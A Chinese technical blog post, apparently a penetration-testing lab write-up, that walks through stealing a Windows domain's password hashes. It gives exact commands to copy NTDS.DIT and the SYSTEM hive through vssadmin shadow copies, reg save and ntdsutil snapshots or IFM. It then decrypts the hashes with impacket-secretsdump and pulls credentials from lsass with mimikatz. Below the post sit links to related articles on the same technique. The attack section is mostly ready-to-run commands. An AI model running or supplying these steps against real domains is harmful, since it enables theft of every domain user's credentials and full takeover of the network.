域凭据获取——利用NTDS.DIT获取windows域哈希

最新推荐文章于 2024-08-07 14:37:32 发布
最新推荐文章于 2024-08-07 14:37:32 发布
阅读量860 收藏 24
点赞数 16
分类专栏: 内网渗透 文章标签: windows 哈希算法 算法
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/140917445
版权

文章目录


在这里插入图片描述
攻击机kali IP:192.168.111.0
跳板机win7 IP:192.168.111.128,192.168.52.143
靶机win server 2008 IP:192.168.52.138

一、NTDS.DIT文件简介

NTDS.DIT文件是域控制器的数据库文件,该文件作为AD的数据库,存储了AD的所有数据,包括域内的用户对象、组和组成员身份等信息,以及域内所有用户的凭据信息。该文件位于域控制器下的%SystemRoot%根目录下。NTDS.DIT文件与Windows主机中的SAM文件类似,不同点在于SAM文件中只存放本机的用户哈希,而NTDS.DIT文件中存放了所有域用户的哈希凭据。在windows中NTDS.DIT文件同样被Windows系统锁定,正常操作无法复制该文件,权限低于system的用户将无法读取。

二、使用vssadmin创建NTDS.DIT副本文件

vssadminn作为卷影(又名快照)复制服务的组件管理平台,能够在不影响登录用户和程序正常运行的情况下备份文件。

普通域用户正常情况下不能登录域控。这里使用域管理员组用户登录域控。

1、在域控win server 2088下。执行下面的命令为C盘创建一个卷影副本。需要使用管理器权限打开命令行

vssadmin create shadow /for=c:

在这里插入图片描述

2、将卷影副本中的NTDS.DIT复制出来。其中,\\?\GLOBALROOT\Device\HarddiskVolumeshadowCopy1就是我们在创建卷影副本时所返回的副本卷名。

copy \\?\GLOBALROOT\Device\HarddiskVolumeshadowCopy1\Windows\NTDS\NTDS.DIT C:\ntds.dit.save # 将将卷影副本中的NTDS.DIT复制出来,复制到C:\ntds.dit.save

在这里插入图片描述

3、删除刚刚创建的卷影副本。其中,b90079b2-fb2b-4940-a4ed-da38c9fae4f0为成功创建卷影副本后返回的卷影副本ID。

vssadmin delete shadows /shadow={b90079b2-fb2b-4940-a4ed-da38c9fae4f0} # 删除刚刚创建的卷影副本

在这里插入图片描述
4、NTDS.DIT文件的解密方式和SAM文件差不多,它们都需要借助SYSTEM文件来解密。以下有两种方式导出SYSTEM文件

# 注册表方式
reg save HKLM\SYSTEM "C:\system.save"

在这里插入图片描述

# 卷影副本导出
copy \\?\GLOBALROOT\Device\HarddiskVolumeshadowCopy1\Windows\System32\config\SYSTEM C:\system.hiv

在这里插入图片描述

卷影存在,才能复制出来

5、在kali中使用``解密NTDS.DIT

impacket-secretsdump -ntds ./ntds.dit.save -system ./system.save LOCAL

在这里插入图片描述

三、使用Ntdsutil.exe获取NTDS.DIT

Ntdsutil.exe是微软提供的一个为AD提供管理设施的命令行工具。利用该工具可以维护和管理AD的数据库,清理不常用的服务器对象,整理AD数据文件下线碎片等。特别注意的是,使用Ntdsutil.exe复制Windows目录下的文件不受Windows锁定机制的限制,且Ntdsutil.exe默认安装在域控上

1、同样使用域管理员组用户登录域控。管理员运行命令行。执行下面的命令,创建一个快照。

ntdsutil snapshot "activate instance ntds" create quit quit # 创建快照

在这里插入图片描述
2、查看快照

ntdsutil.exe snapshot "list all" quit quit

在这里插入图片描述
3、加载刚刚创建的快照

ntdsutil snapshot "mount {caf952cb-6e9f-4a4f-b35c-dc9b90e808ec}" quit quit

在这里插入图片描述
4、将快照内的ntds.dit文件复制到C:\目录下

copy C:\$SNAP_202408050951_VOLUMEC$\windows\NTDS\ntds.dit C:\ntds.dit

在这里插入图片描述
5、将SYSTEM解密文件也复制出来

copy C:\$SNAP_202408050951_VOLUMEC$\windows\System32\config\SYSTEM C:\SYSTEM

在这里插入图片描述
导出来后,使用kali的impacket-secretsdump解密即可。

6、卸载和删除快照。

ntdsutil snapshot "unmount {caf952cb-6e9f-4a4f-b35c-dc9b90e808ec}" quit quit # 卸载
ntdsutil snapshot "delete {caf952cb-6e9f-4a4f-b35c-dc9b90e808ec}" quit quit # 删除

在这里插入图片描述

7、也可以使用Ntdsutil自带的IFM(媒体安装集)进行导出。Ntdsutil在创建IFM时会自动生成快照,加载并将NTDS.DIT和SYSTEM文件复制出来。

ntdsutil "activate instance ntds" Ifm "create full C:\ntdsutil" quit quit

在这里插入图片描述

结果存放在C:\ntdsutil文件夹中,在Active Direcory中保存ntds.dit文件,在registry中保存SYSTEM文件。

四、注入Lsass进程获取域用户哈希

在域中并非只有NTDS.DIT文件保存用户凭证,域内用户进行登录操作同样会在域控服务器的lsass进程中保存该域用户的凭证信息。将mimikatz放置在域控制器中,执行下面的命令获取凭证。

privilege::debug # 开启debug特权
lsadump::lsa /inject inject # 从lsass进程中获取凭证

在这里插入图片描述

PT_silver
关注
专栏目录
1.2物理接触获取并破解windows系统密码
weixin_44023460的博客
01-02 361
1.2物理接触获取并破解windows系统密码 很多人认为个人计算机比较安全,因为给计算机设置了密码,外人不知道设置的密码,因此也就安全了,其实这里面很很大的误解,个人计算机安全除了设置密码强健程度以外,还需要设置禁用光盘启动,禁止修改BIOS。下面介绍密码相关知识,了解这些将有助于防范黑客攻击和资料外泄。 1.2.1Windows密码获取思路 windows系统密码获取有多种方式,下面对获取windows密码的思路进行总结: 1.通过0day直接获取权限,然后通过wce等工具获取明文或者哈希值,比如ms0
ntds.dit
SecINAdmin的博客
11-26 1395
ntds.ditntds.dit为ad的数据库(C:\Windows\NTDS),内容有用户、组、用户hash等信息,控上的ntds.dit只有可以登录到控的用户(如管用户、DC本地管理员用户)可以访问。ntds.dit包括三个主要表:数据表、链接表、sd表。所以只要在渗透中能够获取ntds.dit就可以获取到所有用户的用户名和对应的hash,ntds.dit是加密的,需要获取system来解密。查看dit数据库可使用https://github.com/yosqueoy/ditsna
Windowsntds.dit中提取Hash和信息
子曰小玖的博客
04-30 961
在渗透测试进入内网之后,首要目标就是得到控权限,将中所有用户的hash值全部跑出来,下载到本地。很多工具比如meterpreter中的smart_hashdump和Impacket中的secretsdump.py都可以做到。 但是有些情况下我只能拷贝出来NTDS.dit文件,然后离线将这些密码提取出来。今天正好碰到了这一情况,接下来我将详细的介绍一下如何将密码导出,当然假设我已经成功将这两个...
控安全 ----> Ntds.dit文件抓取
huohaowen的博客
05-05 1689
大家还记得内网渗透的初衷吗???找到馆,拿下控!!拿下了控就是拿下了整个!!但是大家知道拿下环境之后应该怎么操作吗(灵魂拷问)???那么下面,开始我们今天的内容 NTDS.DIT文件!!
渗透之获得控服务器的NTDS.dit文件
cj_Hydra's Blog
02-15 2074
前言: ntds.dit是主要的AD数据库,存放在c:\windows\NTDS\NTDS.dit,包括有关用户,组和成员身份的信息,它还包括中所有用户的密码哈希值,为了进一步保护哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。 因为这两个文件属于系统特殊文件,不能直接复制粘贴,所以需要用特殊的方式来复制粘贴。 当我们拿到控的权限后,我们可以跑内所有的hash值,...
windows 内密码凭证获取
weixin_43873557的博客
02-08 881
windows\NTDS\ntds.dit windows\system32\config\system windows\system32\config\security ntds.dit:活动目录数据库,包括有关用户、组和组成员身份的信息。它还包括中所有用户的密码哈希值。 为了保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。因此想要破解工作组sam文件与ntds.dit文件都需要拥有一个system文件 AD DS数据存储: • 由 ntds.dit 文件构成 • 默
【渗透笔记】内密码凭证获取
白菜猪肉炖粉条
12-28 1721
Volume Shadow Copy 活动目录数据库 ntds.dit 活动目录数据库,包括有关用户、组和组成员身份的信息。它还包括中所有用户的密码哈希值。 为了保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。 因此想要破解sam文件和ntds.dit文件都需要拥有一个system文件 ntds.dit文件位置:%SystemRoot%\NTDS\NTDS.dit system文件位置:%SystemRoot%\System32\config\SYSTEM sa
DSInternals:目录服务内部(DSInternals)PowerShell模块和框架
04-29
目录服务内部PowerShell模块和框架 介绍 DSInternals项目包含以下两个部分: 公开了Active ... 离线ntds.dit文件操作,包括哈希转储, 密码重置, 组成员身份更改, SID历史记录注入以及启用/ 禁用帐户。 通过
渗透之Pass-the-hash
ToyCarryYou的博客
04-24 1140
渗透 什么是AD AD的全称是Active Directory(活动目录) 是指windows服务器操作系统中的目录服务,它被包含在大多数windows sever操作系统中,负责集中式管理及身份认证。AD中是每个Windows网络的基石。他负责存储成员(包括设备和用户)的信息,验证其凭据并定义访问权限。运行此服务的服务器称为控制器。AD架构的常用对象包括以下四种 1.**组织单位...
ntds.dit文件的获取与解密
热门推荐
Shanfenglan's blog
08-21 28万+
它们在哪儿? ntds.dit文件是环境中控上会有的一个文件,这个文件存储着内所有用户的凭据信息(hash)。非环境也就是在工作组环境中,有一个sam文件存储着当前主机用户的密码信息,想要破解sam文件与ntds.dit文件都需要拥有一个system文件。 ntds.dit文件位置: C:\Windows\NTDS\NTDS.dit system文件位置:C:\Windows\System32\config\SYSTEM sam文件位置:C:\Windows\System32\config\SAM
[内网渗透]—卷影拷贝提取ntds.dit
Sentiment的博客
12-08 974
ntds.dit文件是一个数据库,用于存储Active Directory数据,包括有关用户对象,组和组成员身份的信息。它包括中所有用户的密码哈希。通过提取这些哈希值,可以使用诸如Mimikatz之类的工具执行哈希传递攻击,或使用诸如Hashcat之类的工具来破解这些密码。这些密码的提取和破解可以脱机执行,因此将无法检测到。一旦攻击者提取了这些散列,它们便可以充当上的任何用户,包括管理员。在活动目录中,所有的数据都保存在ntds.dit中。
NTDS.dit hash提取工具
weixin_34404393的博客
06-22 277
NTDS.dithash提取工具 为保证不修改quarkspwdump版权信息,没有quarkspwdump修改其他功能的使用,其他原有的功能都可以正常使用,只添加了几个自己添加的参数。NTDS.dit是个什么鬼呢? 在内,HASH是存在NTDS.DIT中的,NTDS.DIT是一个二进制文件,就等同于本地计算机的SAM文件,它的存放位置是%SystemRoot%...
内网渗透--提取NTDS
qq_62169455的博客
09-24 847
NTDS.DIT:为DC的数据库,内容有用户、组、用户hash等信息,控上的ntds.dit只有可以登录到控上的用户(如管用户、DC本地管理员用户)可以访问,为了进一步保护密码哈希值,使用存储在SYSTEM注册表配置单元中的密钥对这些哈希值进行加密。位置:C:\Windows\NTDS该文件和SAM文件类似,是不能直接读取的,也不能复制。
【内网学习笔记】26、ntds.dit 的提取与散列值导出
TeamsSix 的 CSDN 空间
09-09 1406
0、前言 在活动目录中,所有数据都保存在 ntds.dit 文件中,ntds.dit 是一个二进制文件,存储位置为控的 %SystemRoot%\ntds.dit ntds.dit 中包含(但不限于)用户名、散列值、组、GPP、OU 等与活动目录相关的信息,因此如果我们拿到 ntds.dit 就能获取内所有用户的 hash 在通常情况下,即使拥有管理员权限,也无法读取控中的 ntds.dit 文件(因为活动目录始终访问这个文件,所以文件被禁止读取),它和 SAM 文件一样,是被 Windows 操作
内密码凭证获取
qq_58000413的博客
04-26 1320
Quarks Pw Dump是一款开放源代码的Windows用户凭据提取工具,它可以抓取windows平台下多种类型的用户凭据,包括:本地账户、账户、缓存的账户和Bitlocker。ntds.dit:活动目录数据库,包括有关用户、组和成员身份的 信息。VSSAdmini:是Windows系统提供的卷影复制服务(VSS)的管理工具,环境默认安装。ntds.dit文件位置:%SystemRoot%\NTDS\NTDS.dit。可以 十分高效的破解ntds文件并将全部用户信息导出方便查找用户状态。
控安全:多种方式提取ntds.dit
最新发布
8888的博客
08-07 1088
ntds.dit为AD的数据库,内容有用户、组、用户hash等信息,控上的ntds.dit只有可以登录到控的用户(如管用户、DC本地管理员用户)可以访问。可以通过创建一个 IFM 的方式获取 ntds.dit,在使用 ntdsutil 创建媒体安装集(IFM)时,需要进行生成快照、加载、将 ntds.dit 和计算机的 SAM 文件复制到目标文件夹中等操作,这些操作也可以通过PowerShell 或 VMI 远程执行。第三步:复制快照中的ntds.dit文件。第二步:创建一个C盘的卷影副本。
怎么解析NTDS.dit
04-27
NTDS.ditWindows操作系统中Active Directory数据库文件的一部分。要解析NTDS.dit文件,可以使用工具如dsdbutil、ntdsutil和esentutl等。这些工具可以帮助管理员执行各种操作,例如备份和还原数据库、重建索引、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值